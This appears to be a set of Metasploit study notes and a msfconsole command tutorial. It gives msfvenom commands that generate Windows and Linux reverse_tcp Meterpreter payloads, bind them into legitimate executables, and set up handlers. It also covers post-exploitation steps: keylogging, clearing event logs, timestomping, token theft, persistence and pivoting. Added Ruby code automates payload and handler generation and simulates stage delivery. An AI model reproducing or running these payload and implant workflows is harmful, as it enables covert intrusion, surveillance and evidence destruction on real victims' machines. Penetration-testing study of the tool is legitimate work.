  • msfconsole
    2022-02-18 21:27:24

    After starting msfconsole, the MSF console prints its banner:
    └─msfconsole                                         2 ⨯


             .                                         .
     .

          dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
           '   dB'                     BBP
        dB'dB'dB' dBBP     dBP     dBP BB
       dB'dB'dB' dBP      dBP     dBP  BB
      dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                       dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
              .                  .                  dB' dBP    dB'.BP
                                 |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                               --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                                 |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

         .
                    .
            o                  To boldly go where no
                                shell has gone before


           =[ metasploit v6.1.28-dev                          ]
    + -- --=[ 2197 exploits - 1163 auxiliary - 400 post       ]
    + -- --=[ 596 payloads - 45 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                       ]

    Metasploit tip: View all productivity tips with the
    tips command

    msf6 > banner
    Call trans opt: received. 2-19-98 13:24:18 REC:Loc

         Trace program: running

               wake up, Neo...
            the matrix has you
          follow the white rabbit.

              knock, knock, Neo.

                            (`.         ,-,
                            ` `.    ,;' /
                             `.  ,'/ .'
                              `. X /.'
                    .-;--''--.._` ` (
                  .'            /   `
                 ,           ` '   Q '
                 ,         ,   `._    \
              ,.|         '     `-.;_'
              :  . `  ;    `  ` --,.._;
               ' `    ,   )   .'
                  `._ ,  '   /_
                     ; ,''-,;' ``-
                      ``-..__``--`

                                 https://metasploit.com


           =[ metasploit v6.1.28-dev                          ]
    + -- --=[ 2197 exploits - 1163 auxiliary - 400 post       ]
    + -- --=[ 596 payloads - 45 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                       ]

    Metasploit tip: You can pivot connections over sessions
    started with the ssh_login modules

    Searching for exploits of a given CVE year on a given platform, by piping search through grep (search cve:2021 platform:windows type:exploit gives the same result without grep and is the idiomatic form):

    msf6 > grep windows search cve:2021
       0 exploit/windows/http/advantech_iview_unauth_rce                         2021-02-09       excellent  Yes    Advantech iView Unauthenticated Remote Code Execution
       4   exploit/windows/local/canon_driver_privesc                              2021-08-07       normal     Yes    Canon Driver Privilege Escalation
       8   exploit/windows/local/cve_2021_21551_dbutil_memmove                     2021-05-04       good       Yes    Dell DBUtil_2_3.sys IOCTL memmove
       12  exploit/windows/http/fortilogger_arbitrary_fileupload                   2021-02-26       normal     Yes    FortiLogger Arbitrary File Upload Exploit
       17  exploit/windows/local/lexmark_driver_privesc                            2021-07-15       normal     Yes    Lexmark Driver Privilege Escalation
       20  exploit/windows/http/exchange_proxylogon_rce                            2021-03-02       excellent  Yes    Microsoft Exchange ProxyLogon RCE
       22  exploit/windows/http/sharepoint_unsafe_control                          2021-05-11       excellent  Yes    Microsoft SharePoint Unsafe Control and ViewState RCE
       23  exploit/windows/http/netmotion_mobility_mvcutil_deserialization         2021-02-08       excellent  Yes    NetMotion Mobility Server MvcUtil Java Deserialization
       34  exploit/windows/local/cve_2021_1732_win32k                              2021-02-10       good       Yes    Win32k ConsoleControl Offset Confusion
       35  post/windows/gather/credentials/windows_sam_hivenightmare               2021-07-20       normal     No     Windows SAM secrets leak - HiveNightmare
    msf6 >


    msf6 > help search
    Usage: search [<options>] [<keywords>:<value>]

    Prepending a value with '-' will exclude any matching results.
    If no options or keywords are provided, cached results are displayed.


    OPTIONS:

        -h, --help                      Help banner
        -I, --ignore                    Ignore the command if the only match has the same name as the search
        -o, --output <filename>         Send output to a file in csv format
        -r, --sort-descending <column>  Reverse the order of search results to descending order
        -S, --filter <filter>           Regex pattern used to filter search results
        -s, --sort-ascending <column>   Sort search results by the specified column in ascending order
        -u, --use                       Use module if there is one result

    Keywords:
      aka              :  Modules with a matching AKA (also-known-as) name
      author           :  Modules written by this author
      arch             :  Modules affecting this architecture
      bid              :  Modules with a matching Bugtraq ID
      cve              :  Modules with a matching CVE ID
      edb              :  Modules with a matching Exploit-DB ID
      check            :  Modules that support the 'check' method
      date             :  Modules with a matching disclosure date
      description      :  Modules with a matching description
      fullname         :  Modules with a matching full name
      mod_time         :  Modules with a matching modification date
      name             :  Modules with a matching descriptive name
      path             :  Modules with a matching path
      platform         :  Modules affecting this platform
      port             :  Modules with a matching port
      rank             :  Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
      ref              :  Modules with a matching ref
      reference        :  Modules with a matching reference
      target           :  Modules affecting this target
      type             :  Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)

    Supported search columns:
      rank             :  Sort modules by their exploitabilty rank
      date             :  Sort modules by their disclosure date. Alias for disclosure_date
      disclosure_date  :  Sort modules by their disclosure date
      name             :  Sort modules by their name
      type             :  Sort modules by their type
      check            :  Sort modules by whether or not they have a check method


    Examples:
      search cve:2009 type:exploit
      search cve:2009 type:exploit platform:-linux
      search cve:2009 -s name
      search type:exploit -s type -r

  • msfconsole study notes

    2021-06-28 22:27:51

    Tools:

            Quasar (Windows):

            AhMyth (Android):

    Starting msfconsole:

            msfconsole

            msfconsole -q        # quiet mode: no startup banner

    1. Generating a payload with MSF and catching the connection

            Use the handler module: use exploit/multi/handler

            Command: show options  - lists the parameters that must be filled in and their current values

    Name   Current Setting  Required  Description
    LHOST                   yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port

            Set LHOST and LPORT (one variable per set command): set LHOST <local ip>, then set LPORT <local listening port>

            List payloads: show payloads

            Set the payload: set payload windows/meterpreter/reverse_tcp

    Generating the payload executable:

            With msfvenom

            msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 -o ./meter_re_tcp_x86.exe LHOST=<local ip> LPORT=<local port>

            msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -a x64 -o ./meter_re_tcp_x64.exe LHOST=<local ip> LPORT=<local port>

    Starting the listener:

            First enter the handler module (use exploit/multi/handler), then:

            run

            exploit        # run and exploit are equivalent here; the handler's payload, LHOST and LPORT must match the values baked into the generated file


    2. VBS payload with MSF

    windows-vbs:

            vbs: a source-code (script) payload rather than a compiled binary

            With msfvenom

            msfvenom -p windows/meterpreter/reverse_tcp -f vbs -a x86 -o ./meter_re_tcp_x86.vbs LHOST=<local ip> LPORT=<local port>        # -f vbs produces a script, so the output name gets a .vbs extension

    msfconsole -r file        (put the console commands in a file; msf reads and executes them automatically at startup)


    3. Binding the payload to a legitimate executable

            Embed the payload in a normal program

            msfvenom -p windows/meterpreter/reverse_tcp -f exe -x ./test.exe -a x86 --platform windows -o ./kunbang.exe LHOST=<connect-back ip> LPORT=4444

            Note: -x needs a valid, working PE executable as the template; add -k to keep the template's original behaviour and run the payload in a new thread

    Payload obfuscation


    Meterpreter

    1. Overview

            Used to manage the implant (full control of the compromised machine)

    2. Operations

            1. After a session connects, view the screen in real time: screenshare

            2. Control: ls lists files

            3. Upload / download: download <file>, upload <local file>

    # File operations:

            Linux-style file commands

            Working directory: local (attacker side): getlwd        remote (target side): getwd (alias pwd)

            Download a file: download <file>

            Upload a file: upload <local file> [remote path]

            Edit a file: edit <file>

            Search for files: search -f <pattern> (optionally -d <directory>)

            List mounted drives: show_mount

            File hash: checksum md5|sha1 <file>

    # System operations

    No.  Description                  Command
    1    Privilege escalation         getsystem
    2    Clear the event logs         clearev
    3    Get environment variables    getenv
    4    Get the current PID          getpid

    Command       Description
        -------       -----------
        clearev       Clear the event log
        drop_token    Relinquishes any active impersonation token.
        execute       Execute a command
        getenv        Get one or more environment variable values
        getpid        Get the current process identifier
        getprivs      Attempt to enable all privileges available to the current process
        getsid        Get the SID of the user that the server is running as
        getuid        Get the user that the server is running as
        kill          Terminate a process
        localtime     Displays the target system local date and time
        pgrep         Filter processes by name
        pkill         Terminate processes by name
        ps            List running processes
        reboot        Reboots the remote computer
        reg           Modify and interact with the remote registry
        rev2self      Calls RevertToSelf() on the remote machine (drops back to the original token after getsystem / steal_token)
        shell         Drop into a system command shell
        shutdown      Shuts down the remote computer
        steal_token   Attempts to steal an impersonation token from the target process
        suspend       Suspends or resumes a list of processes
        sysinfo       Gets information about the remote system, such as OS

    # Network operations

     Command       Description
        -------       -----------
        arp           Display the host ARP cache
        getproxy      Display the current proxy configuration
        ifconfig      Display interfaces
        ipconfig      Display interfaces
        netstat       Display the network connections
        portfwd       Forward a local port to a remote service (port forwarding)
        resolve       Resolve a set of host names on the target
        route         View and modify the routing table

    Port forwarding:

            portfwd add -l <local port> -p <remote port> -r <remote host>        # forward a local port through the session to a host the target can reach

    # Other operations

    Interactive commands

            Keyboard and mouse control and logging (keyscan_start / keyscan_dump / keyscan_stop); disabling keyboard and mouse input (uictl disable keyboard|mouse)

            Modifying file timestamps (timestomp)

    3. Handling multiple implants with one MSF listener

            set ExitOnSession false        # keep the handler running after the first session; the default is true (the handler exits after one session)

            run -j        # run the handler as a background job (exploit -j -z is the usual form)

            jobs        # list running jobs

            jobs -p <id>        # make a job persistent so it survives a console restart (this does not stop the listener)

            sessions -i <id>        # interact with a session

            bg        # background the session and return to the msf prompt (alias: background)

            jobs -k <id>        # kill a job, i.e. stop the listener
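An added example (my code, not from the notes above and not Metasploit code) tying sections 1 to 3 together: it builds the msfvenom command line and the resource file for the matching handler from one payload name, so the -a architecture, the --platform, LHOST/LPORT and the output extension cannot drift apart (a -f vbs payload written to a .exe name is exactly the slip it catches). The architecture list and the format-to-extension table are assumptions of the example, not something msfvenom exposes.

```ruby
require 'ipaddr'

# Architectures that appear as the second path component of a payload name;
# when none is present the payload is 32-bit x86 (windows/meterpreter/... is
# x86, windows/x64/meterpreter/... is x64). Assumption of this example.
ARCH_COMPONENTS = %w[x64 x86 aarch64 armle armbe mipsle mipsbe mips64 ppc ppc64].freeze

# Extensions that should go with an -f format; my convention, not msfvenom's.
FORMAT_EXT = { 'exe' => '.exe', 'vbs' => '.vbs', 'dll' => '.dll', 'psh' => '.ps1',
               'elf' => '.elf', 'macho' => '.macho', 'raw' => '.bin' }.freeze

def payload_platform(payload)
  payload.split('/').first
end

def payload_arch(payload)
  parts = payload.split('/')
  ARCH_COMPONENTS.include?(parts[1]) ? parts[1] : 'x86'
end

def validate_listener!(lhost, lport)
  IPAddr.new(lhost)                         # raises IPAddr::InvalidAddressError on junk
  port = Integer(lport)                     # raises ArgumentError on "44x4"
  raise ArgumentError, "LPORT #{port} is not a valid TCP port" unless (1..65_535).cover?(port)
end

# msfvenom argv with -a/--platform derived from the payload path, so the
# generated file and the handler can never disagree on architecture.
def msfvenom_command(payload:, lhost:, lport:, format:, out:, template: nil, keep: false)
  validate_listener!(lhost, lport)
  ext = FORMAT_EXT[format]
  if ext && !out.end_with?(ext)
    raise ArgumentError, "output #{out} does not match -f #{format} (expected #{ext})"
  end
  argv = ['msfvenom', '-p', payload, "LHOST=#{lhost}", "LPORT=#{lport}",
          '-a', payload_arch(payload), '--platform', payload_platform(payload),
          '-f', format]
  argv += ['-x', template] if template      # bind into a legitimate binary
  argv << '-k' if keep                       # keep the template's own behaviour
  argv + ['-o', out]
end

# Resource file for the matching multi/handler: -j backgrounds the job, -z
# stops the console from auto-interacting, ExitOnSession false keeps the
# listener up for further callbacks (the "several implants, one listener" setup).
def handler_rc(payload:, lhost:, lport:, multi: true)
  validate_listener!(lhost, lport)
  <<~RC
    use exploit/multi/handler
    set PAYLOAD #{payload}
    set LHOST #{lhost}
    set LPORT #{lport}
    set ExitOnSession #{multi ? 'false' : 'true'}
    exploit -j -z
  RC
end

if __FILE__ == $PROGRAM_NAME
  payload_name = 'windows/x64/meterpreter/reverse_tcp'
  puts msfvenom_command(payload: payload_name, lhost: '10.0.0.5', lport: 4444,
                        format: 'exe', out: 'meter_re_tcp_x64.exe').join(' ')
  puts handler_rc(payload: payload_name, lhost: '10.0.0.5', lport: 4444)
end
```

Write the returned text to handler.rc and start the listener with msfconsole -r handler.rc; the argv array can be handed to system() or printed and pasted.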

    4. Persistence with MSF

            show advanced        # advanced options of the current module

            run persistence -<options>        # install persistence from the session

    meterpreter> run persistence -<options>

            Note: the persistence Meterpreter script is deprecated in msf6; the maintained equivalent is the post module post/windows/manage/persistence_exe (run post/windows/manage/persistence_exe from the session, or use it from the console with SESSION set)

            Alternatively regenerate a payload (e.g. VBS) and place it in the startup folder

    5. MSF process operations (execute / migrate)

            execute:

            e.g. execute -f notepad

            Useful options:

            execute -f cmd -i -H        # -i interact with the process, -H hide the window

            execute -f /home/kali/Desktop/cmd.exe -m -d notepad        # run an executable from attacker memory (-m) under a dummy process name (-d): a "puppet" process

            To move the Meterpreter session itself into another process, use migrate <pid> (pick a candidate from ps)

    6. Vulnerability scanning and exploitation with MSF

           Find the vulnerability -> use the exploit module -> set the options -> check -> exploit

            show targets        # list the attack targets; choose one with set TARGET <id>

            back        # return to the msf6 > prompt

            ? / help        # list commands

            search <vulnerability name>        # search for a module

            check        # test whether the host has the vulnerability without exploiting it (only modules that implement check support this)

            e.g. test with EternalBlue: module ms17_010_eternalblue (exploit/windows/smb/ms17_010_eternalblue)

    7. Reaching an internal network (pivoting)

            A listener on the public internet reaching a target on an internal network needs a path through the NAT (port forwarding on the edge, or a relay); once a session exists, further internal hosts are reached through it

            Port forwarding (portfwd) and routes through the session (route add)

    8. MSF stagers and stages

            Payload kinds:

                    single (inline): everything in one blob, nothing to download afterwards; named with an underscore, e.g. windows/meterpreter_reverse_tcp

                    staged: stager + stage

            Path layout: <platform>/[<arch>/]<stage>/<stager>

    e.g. windows/x64/meterpreter/reverse_tcp     meterpreter: the stage   reverse_tcp: the stager

    On success: the small stager is what runs on the target first and its only job is to establish the connection; the handler then sends the much larger stage over that connection and the stager loads it into memory

    Classification:

            the stage is delivered back over the transport the stager set up (reverse_tcp, reverse_https, bind_tcp, ...)
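An added example (my code, not from the original notes and not Metasploit code) of the stager/stage hand-off described above, reduced to its framing: the stager connects back to LHOST:LPORT, the handler answers with a 4-byte little-endian length followed by the stage, and the stager reads exactly that many bytes before it would execute them. The stage bytes are a constructed placeholder (real stagers receive position-independent code), the session UUID that newer reverse_tcp handlers prepend is omitted, and the two sides run over loopback in one process.

```ruby
require 'socket'

# Length prefix the handler sends ahead of the stage: 4 bytes, little-endian,
# the framing the classic reverse_tcp stager expects. Everything else about a
# real stager (shellcode, RWX allocation, jumping into the stage) is left out.
LENGTH_PREFIX = 4

# Handler side (what multi/handler does after accept): send <length><stage>.
# truncate_to simulates a connection that drops part-way through the send.
def handler_send_stage(sock, stage, truncate_to: nil)
  frame = [stage.bytesize].pack('V') + stage
  frame = frame.byteslice(0, truncate_to) if truncate_to
  sock.write(frame)
end

# Stager side: learn the stage size, read exactly that many bytes and hand
# them to whatever would execute them. The size limit stands in for the
# memory a real stager has to allocate before it knows what it is receiving.
def stager_receive_stage(sock, max_size: 16 * 1024 * 1024)
  header = sock.read(LENGTH_PREFIX)
  if header.nil? || header.bytesize < LENGTH_PREFIX
    raise 'connection closed before the length prefix arrived'
  end
  size = header.unpack1('V')
  raise "refusing oversized stage (#{size} bytes)" if size > max_size
  stage = sock.read(size)
  if stage.nil? || stage.bytesize != size
    raise "short read: got #{stage.to_s.bytesize} of #{size} stage bytes"
  end
  stage
end

# Run both halves over loopback: the handler listens (LHOST/LPORT), the stager
# connects out to it, and the stage flows handler -> stager.
def deliver_stage(stage, truncate_to: nil)
  server = TCPServer.new('127.0.0.1', 0)          # port 0: any free port
  port = server.addr[1]
  handler = Thread.new do
    client = server.accept                        # the stager called back
    handler_send_stage(client, stage, truncate_to: truncate_to)
    client.close
  end
  stager = TCPSocket.new('127.0.0.1', port)       # reverse_tcp: target -> attacker
  stager_receive_stage(stager)
ensure
  stager&.close
  handler&.join
  server&.close
end

if __FILE__ == $PROGRAM_NAME
  stage = ("\x90" * 4096 + 'fake-meterpreter-stage').b   # constructed placeholder
  got = deliver_stage(stage)
  puts "stager received #{got.bytesize} bytes, identical: #{got == stage}"
end
```

The two failure paths matter in practice: a handler that closes before the 4-byte prefix (wrong payload set on the handler, or a proxy that does not speak raw TCP) and a connection that drops mid-stage, which a stager must detect rather than jump into a half-filled buffer.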

    9. Exploit workflow summary

            Choose an exploit module for the situation and use it

            Choose a payload for the situation and set it

            Show options: show options

            Show advanced options: show advanced

            Set parameters: set

            Check whether the target is exploitable (check)

            Run the exploit (run / exploit)

            Use exploit/multi/handler for a convenient stand-alone listener


    MSF Linux attack

    msf6 > use payload/linux/x64/meterpreter/reverse_tcp

    set the options (LHOST, LPORT)

    generate -f <format> -o <output path>        # build the payload from inside the payload module (-f elf for a Linux executable)

    handler -H <listen ip> -P <listen port> -n <job name> -p <payload>        # start a matching multi/handler job without leaving the payload module


    MSF Mac attack

    OSX

    Same as Linux (use the osx/... payloads, -f macho)

    MSF Android & iOS attacks

    MSF cross-platform payloads

    Generate source

            Source code in a language that runs on several platforms (e.g. python/meterpreter/reverse_tcp, java/meterpreter/reverse_tcp) or an executable format that does

  • MSFconsole core commands tutorial

    2020-12-18 19:27:22

    MSFconsole has many different command options to choose from. The following are the core Metasploit commands with their meaning.

    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    edit          Edit the current module with $VISUAL or $EDITOR
    exit          Exit the console
    get           Get the value of a context-specific variable
    getg          Get the value of a global variable
    go_pro        Launch the Metasploit web GUI
    grep          Grep the output of another command
    help          Help menu
    info          Display information about one or more modules
    irb           Drop into an irb scripting mode
    jobs          Display and manage jobs
    kill          Kill a job
    load          Load a framework plugin
    loadpath      Search for and load modules from a path
    makerc        Save the commands entered since start to a file
    popm          Pop the latest module off the stack and make it active
    previous      Set the previously loaded module as the current module
    pushm         Push the active or list of modules onto the module stack
    quit          Exit the console
    reload_all    Reload all modules from all defined module paths
    rename_job    Rename a job
    resource      Run the commands stored in a file
    route         Route traffic through a session
    save          Save the active datastore
    search        Search module names and descriptions
    sessions      Dump session listings and display information about sessions
    set           Set a context-specific variable to a value
    setg          Set a global variable to a value
    show          Display modules of a given type, or all modules
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well as the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unset one or more context-specific variables
    unsetg        Unset one or more global variables
    use           Select a module by name
    version       Show the framework and console library version numbers

    back

    Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the back command to move out of the current context. This is not required, however: just as in commercial routers, you can switch modules from within other modules. As a reminder, variables only carry over between modules if they are set globally (setg).

    msf auxiliary(ms09_001_write) > back

    msf >

    banner

    Simply displays a randomly selected banner.

    msf > banner

     ______________________________________________________________________________
    |                                                                              |
    |                        3Kom SuperHack II Logon                               |
    |______________________________________________________________________________|
    |                                                                              |
    |                 User Name:          [   security    ]                        |
    |                                                                              |
    |                 Password:           [               ]                        |
    |                                                                              |
    |                                   [ OK ]                                     |
    |______________________________________________________________________________|
    |                                                                              |
    |                            https://metasploit.com                            |
    |______________________________________________________________________________|

           =[ metasploit v4.16.8-dev                          ]
    + -- --=[ 1684 exploits - 964 auxiliary - 299 post        ]
    + -- --=[ 498 payloads - 40 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    check

    Not many exploits support it, but there is also a check option that tests whether a target is vulnerable to a particular exploit instead of actually exploiting it.

    msf exploit(ms08_067_netapi) > show options

    Module options (exploit/windows/smb/ms08_067_netapi):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    172.16.194.134   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

    Exploit target:

       Id  Name
       --  ----
       0   Automatic Targeting

    msf exploit(ms08_067_netapi) > check

    [*] Verifying vulnerable status... (path: 0x0000005a)
    [*] System is not vulnerable (status: 0x00000000)
    [*] The target is not exploitable.
    msf exploit(ms08_067_netapi) >

    color

    You can enable or disable whether the output you get through msfconsole contains colors.

    msf > color

    Usage: color

    Enable or disable color output.

    msf > color false

    connect

    msfconsole has a built-in miniature Netcat clone that supports SSL, proxies, pivoting, and file transfers.

    By issuing the connect command with an IP address and port number, you can connect to a remote host from within msfconsole the same way you would with Netcat or Telnet.

    msf > connect 192.168.1.1 23

    [*] Connected to 192.168.1.1:23

    DD-WRT v24 std (c) 2018 NewMedia-NET GmbH

    Release: 04/17/18 (SVN revision: 10011)

    DD-WRT login:

    You can see all the additional options by issuing the -h parameter.

    msf > connect -h
    Usage: connect [options] <host> <port>

    Communicate with a host, similar to interacting via netcat, taking advantage of any configured session pivoting.

    OPTIONS:
        -C  Try to use CRLF for EOL sequence.
        -P  Specify source port.
        -S  Specify source address.
        -c  Specify which Comm to use.
        -h  Help banner.
        -i  Send the contents of a file.
        -p  List of proxies to use.
        -s  Connect with SSL.
        -u  Switch to a UDP socket.
        -w  Specify connect timeout.
        -z  Just try to connect, then return.

    edit

    The edit command opens the current module with $VISUAL or $EDITOR. By default this opens the module in Vim.

    msf > use exploit/windows/smb/ms10_061_spoolss

    msf exploit(ms10_061_spoolss) > edit

    [*] Launching /usr/bin/vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms10_061_spoolss.rb

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'msf/windows_error'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::DCERPC
      include Msf::Exploit::Remote::SMB
      include Msf::Exploit::EXE
      include Msf::Exploit::WbemExec

      def initialize(info = {})

    exit

    The exit command simply exits msfconsole.

    msf exploit(ms10_061_spoolss) > exit

    root@kali:~#

    grep

    The grep command is similar to Linux grep: it matches a given pattern against the output of another msfconsole command.

    Below is an example of using grep to match output containing the string "http" from a search for modules containing the string "oracle".

    msf > grep
    Usage: grep [options] pattern cmd

    Grep the results of a console command (similar to the Linux grep command)

    OPTIONS:
        -A  Show arg lines of output After a match.
        -B  Show arg lines of output Before a match.
        -c  Only print a count of matching lines.
        -h  Help banner.
        -i  Ignore case.
        -k  Keep (include) arg lines at start of output.
        -m  Stop after arg matches.
        -s  Skip arg lines of output before attempting match.
        -v  Invert match.

    msf > grep http search oracle

       auxiliary/scanner/http/oracle_demantra_database_credentials_leak  2014-02-28  normal     Oracle Demantra Database Credentials Leak
       auxiliary/scanner/http/oracle_demantra_file_retrieval             2014-02-28  normal     Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
       auxiliary/scanner/http/oracle_ilom_login                                      normal     Oracle ILO Manager Login Brute Force Utility
       exploit/multi/http/glassfish_deployer                             2011-08-04  excellent  Sun/Oracle GlassFish Server Authenticated Code Execution
       exploit/multi/http/oracle_ats_file_upload                         2016-01-20  excellent  Oracle ATS Arbitrary File Upload
       exploit/multi/http/oracle_reports_rce                             2014-01-15  great      Oracle Forms and Reports Remote Code Execution
       exploit/windows/http/apache_chunked                               2002-06-19  good       Apache Win32 Chunked Encoding
       exploit/windows/http/bea_weblogic_post_bof                        2008-07-17  great      Oracle Weblogic Apache Connector POST Request Buffer Overflow
       exploit/windows/http/oracle9i_xdb_pass                            2003-08-18  great      Oracle 9i XDB HTTP PASS Overflow (win32)
       exploit/windows/http/oracle_beehive_evaluation                    2010-06-09  excellent  Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability
       exploit/windows/http/oracle_beehive_prepareaudiotoplay            2015-11-10  excellent  Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload
       exploit/windows/http/oracle_btm_writetofile                       2012-08-07  excellent  Oracle Business Transaction Management FlashTunnelService Remote Code Execution
       exploit/windows/http/oracle_endeca_exec                           2013-07-16  excellent  Oracle Endeca Server Remote Command Execution
       exploit/windows/http/oracle_event_processing_upload               2014-04-21  excellent  Oracle Event Processing FileUploadServlet Arbitrary File Upload
       exploit/windows/http/osb_uname_jlist                              2010-07-13  excellent  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability

    help

    The help command gives you a list of all available commands with a short description of each.

    msf > help

    Core Commands
    =============

        Command       Description
        -------       -----------
        ?             Help menu
        banner        Display an awesome metasploit banner
        cd            Change the current working directory
        color         Toggle color
        connect       Communicate with a host
        ...snip...

    Database Backend Commands
    =========================

        Command           Description
        -------           -----------
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
        ...snip...

    info

    The info command provides detailed information about a particular module, including all options, targets, and other information. Be sure to always read the module description before using it, as some modules may have undesired effects.

    The info command also provides the following information:

    Author and licensing information

    Vulnerability references (i.e. CVE, BID, etc.)

    Any payload restrictions the module may have

    msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

    msf exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index

    [-] Invalid module: info

    Name: MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

    Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index

    Platform: Windows

    Privileged: Yes

    License: Metasploit Framework License (BSD)

    Rank: Good

    Disclosed: 2009-09-07

    Provided by:

    Laurent Gaffie

    hdm

    sf

    Available targets:

    Id Name

    -- ----

    0 Windows Vista SP1/SP2 and Server 2008 (x86)

    Basic options:

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST yes The target address

    RPORT 445 yes The target port (TCP)

    WAIT 180 yes The number of seconds to wait for the attack to complete.

    Payload information:

    Space: 1024

    Description:

    This module exploits an out of bounds function table dereference in

    the SMB request validation code of the SRV2.SYS driver included with

    Windows Vista, Windows 7 release candidates (not RTM), and Windows

    2008 Server prior to R2. Windows Vista without SP1 does not seem

    affected by this flaw.

    References:

    https://technet.microsoft.com/en-us/library/security/MS09-050

    https://cvedetails.com/cve/CVE-2009-3103/

    http://www.securityfocus.com/bid/36299

    OSVDB (57799)

    http://seclists.org/fulldisclosure/2009/Sep/0039.html

    http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

    msf exploit(ms09_050_smb2_negotiate_func_index) >

    irb

    Running the irb command drops you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly. This feature is also very useful for understanding the internals of the Framework.

    msf > irb

    [*] Starting IRB shell...

    >> puts "Hello, metasploit!"

    Hello, metasploit!

    => nil

    >> Framework::Version

    => "4.16.8-dev"

    jobs

    Jobs are modules that run in the background. The jobs command lets you list and terminate these jobs.

    msf > jobs -h
    Usage: jobs [options]

    Active job manipulation and interaction.

    OPTIONS:
        -K  Terminate all running jobs.
        -S  Row search filter.
        -h  Help banner.
        -i  Lists detailed information about a running job.
        -k  Terminate jobs by job ID and/or range.
        -l  List all running jobs.
        -v  Print more detailed info. Use with -i and -l.

    kill

    The kill command with a job ID terminates that running job, similar to kill in Linux.

    msf exploit(ms10_002_aurora) > kill 0

    Stopping job: 0...

    [*] Server stopped.

    load

    The load command loads a plugin from Metasploit's plugin directory. Arguments are passed as key=val on the shell.

    msf > load
    Usage: load <path> [var=val var=val ...]

    Loads a plugin from the supplied path. For a list of built-in plugins, do: load -l
    The optional var=val options are custom parameters that can be passed to plugins.

    msf > load pcap_log

    [*] PcapLog plugin loaded.

    [*] Successfully loaded plugin: pcap_log

    msf >

    loadpath

    The loadpath command loads a third-party module tree from the given path, so you can point Metasploit at your own 0-day exploits, encoders, payloads, etc. and extend its collection.

    msf > loadpath /home/secret/modules

    Loaded 0 modules.

    unload

    Conversely, the unload command unloads a previously loaded plugin and removes any commands it added.

    msf > unload pcap_log

    Unloading plugin pcap_log...unloaded.

    resource

    The resource command runs resource (batch) files that can be loaded through msfconsole.

    msf > resource
    Usage: resource path1 [path2 ...]

    Run the commands stored in the supplied files. Resource files may also contain Ruby code between <ruby></ruby> tags.
    See also: makerc

    Some attacks, such as Karmetasploit, use resource files to run a set of commands from a karma.rc file to create the attack. Later we will see how, outside of Karmetasploit, this can be very useful.

    msf > resource karma.rc

    [*] Processing karma.rc for ERB directives.

    resource (karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook

    resource (karma.rc_.txt)> use auxiliary/server/browser_autopwn

    ...略...

    Batch files can greatly speed up testing and development time and let the user automate many tasks. Besides loading a batch file from within msfconsole, they can also be passed at startup with the -r flag.

    The simple example below creates a batch file that displays the Metasploit version number at startup.

    root@kali:~# echo version > version.rc
    root@kali:~# msfconsole -r version.rc

     IIIIII    dTb.dTb        _.---._
      II     4'  v  'B   .'"".'/|\`.""'.
      II     6.     .P  :  .' / | \ `.  :
      II     'T;. .;P'  '.'  /  |  \  `.'
      II      'T; ;P'    `. /   |   \ .'
     IIIIII     'YvP'      `-.__|__.-'

     I love shells --egypt

           =[ metasploit v4.16.8-dev                          ]
    + -- --=[ 1684 exploits - 964 auxiliary - 299 post        ]
    + -- --=[ 498 payloads - 40 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    [*] Processing version.rc for ERB directives.
    resource (version.rc)> version
    Framework: 4.16.8-dev
    Console  : 4.16.8-dev

    route

    The route command in Metasploit lets you route sockets through a session or 'comm', providing basic pivoting capabilities. To add a route, pass the target subnet and network mask followed by the session (comm) number.

    msf > route -h
    Route traffic destined to a given subnet through a supplied session.

    Usage: route [add/remove] subnet netmask [comm/sid]
           route [add/remove] cidr [comm/sid]
           route [get] <host or network>
           route [flush]
           route [print]

    Subcommands:
      add - make a new route
      remove - delete a route; 'del' is an alias
      flush - remove all routes
      get - display the route for a given target
      print - show all active routes

    Examples:
      Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1
        route add 192.168.0.0 255.255.255.0 1
        route add 192.168.0.0/24 1

      Delete the above route
        route remove 192.168.0.0/24 1
